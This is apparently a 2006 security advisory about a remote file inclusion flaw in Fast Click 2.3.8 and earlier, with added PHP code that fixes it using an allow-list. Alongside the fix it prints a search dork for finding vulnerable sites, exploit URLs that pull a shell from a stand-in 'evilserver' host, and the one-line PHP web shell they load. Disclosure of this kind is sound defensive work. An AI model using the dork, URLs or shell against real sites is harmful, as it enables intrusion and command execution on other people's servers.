Fast Click <= 2.3.8 Remote File Inclusion May 02 2006 07:09PM
Aminrayden yahoo com
Fast Click <= 2.3.8 Remote File Inclusion

-------------------------------------------------------

Aria-security.com advisory

Bug Discovered by R@1D3N (amin emami)

email:AminRayden (at) yahoo (dot) com [email concealed] and rayden (at) aria-security (dot) net [email concealed]

Date:02/05/2006

original advisory:http://www.aria-security.net/advisory/fc/fastclick.txt

--------------------------------------------------------

Affected software description:

Fast Click <= 2.3.8

Vendor:http://www.ftrain.siteburg.com/fclicksqlpro/fclick.php?fclick

Vulnerability: remote file inclusion

Dork:inurl:"fclick.php?fid"

---------------------------------------------------------

Discussion:

The problem is in the files "show.php" and "top.php", which include a file whose location is built from the request-controlled variable $path:

Vulnerable Code:

include($path."cfg.php");

Exploitation example:

http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a

http://[target].com/[path]/top.php?path=http://evilserver/cmd.gif?&cmd=uname -a

---------------------------------------------------------

cmd.gif

-----------

<?

system($cmd);

?>

-----------

* Fix *:

Contact the Vendor
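Until a vendor patch is available, the include in show.php and top.php can be rewritten so that $path never reaches include() as a raw string. The following is an added example, not Fast Click's code: it assumes that cfg.php lives in a fixed set of subdirectories under a hypothetical CONFIG_ROOT, maps the request value against an allow-list, and confirms with realpath() that the resolved file is inside that root, so neither a URL wrapper (http://evilserver/...) nor a traversal sequence can be included. The function name safeConfigPath and the directory names are assumptions for the illustration.

```php
<?php
// Added example, not part of the Fast Click code base.
// Hardened replacement for:  include($path."cfg.php");
// where $path arrived from the query string (show.php?path=...).
//
// Assumptions: every legitimate cfg.php lives below CONFIG_ROOT, and the
// only values the application ever needs in "path" are the names listed
// in $allowedPaths. Both are hypothetical for this illustration.

define('CONFIG_ROOT', __DIR__ . '/config');

// Allow-list of selectable subdirectories; anything else is rejected.
$allowedPaths = array('default', 'themes/blue', 'themes/gray');

/**
 * Returns the absolute filesystem path of cfg.php for an allow-listed
 * selection, or null if the request value must not be included.
 */
function safeConfigPath($requested, array $allowed)
{
    // Reject missing, non-string (e.g. array-injected) and empty values.
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    // Exact, type-strict match against the allow-list: no URLs, no "..".
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $candidate = CONFIG_ROOT . '/' . $requested . '/cfg.php';

    // realpath() resolves symlinks and ".." and returns false when the file
    // does not exist, so a successful result is a real local file.
    $resolved = realpath($candidate);
    $root     = realpath(CONFIG_ROOT);
    if ($resolved === false || $root === false) {
        return null;
    }
    // Defence in depth: the resolved file must still sit under CONFIG_ROOT.
    if (strpos($resolved, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $resolved;
}

$path = isset($_GET['path']) ? $_GET['path'] : 'default';
$cfg  = safeConfigPath($path, $allowedPaths);
if ($cfg === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid configuration selection');
}
include $cfg;
```

The allow-list is what removes the vulnerability; the realpath() check only guards against mistakes in the list itself. As an additional server-side control, setting allow_url_include = Off in php.ini prevents include() from opening remote URLs at all, which blocks this class of exploit even in code that has not been fixed.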

===========================================================

Aria Security Research

Http://www.aria-security.net
